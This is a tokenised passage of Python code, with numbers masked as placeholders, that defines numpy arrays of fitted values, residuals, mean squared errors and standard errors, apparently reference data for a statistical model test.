<NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> y = np . array ( [ np . nan , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> resid = np . array ( [ np . nan , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> yr = np . array ( [ np . nan , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> mse = np . array ( [ <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> stdp = np . array ( [ <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , 